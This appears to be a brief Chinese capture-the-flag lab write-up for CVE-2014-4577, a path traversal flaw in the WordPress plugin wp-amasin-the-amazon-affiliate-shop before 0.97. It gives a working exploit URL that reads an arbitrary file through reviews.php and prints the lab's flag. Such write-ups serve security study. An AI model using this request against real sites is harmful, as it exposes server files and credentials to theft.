春秋云镜 CVE-2014-4577 wordpress插件 wp-amasin-the-amazon-affiliate-shop < 0.97 LFI

靶标介绍

wordpress插件 wp-amasin-the-amazon-affiliate-shop < 0.97 存在路径穿越漏洞，使得可以读取任意文件。

启动场景

漏洞利用

exp

http://url/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/flag

得到flag

flag{829abb40-e72b-48e4-bcbb-755d099e05f9}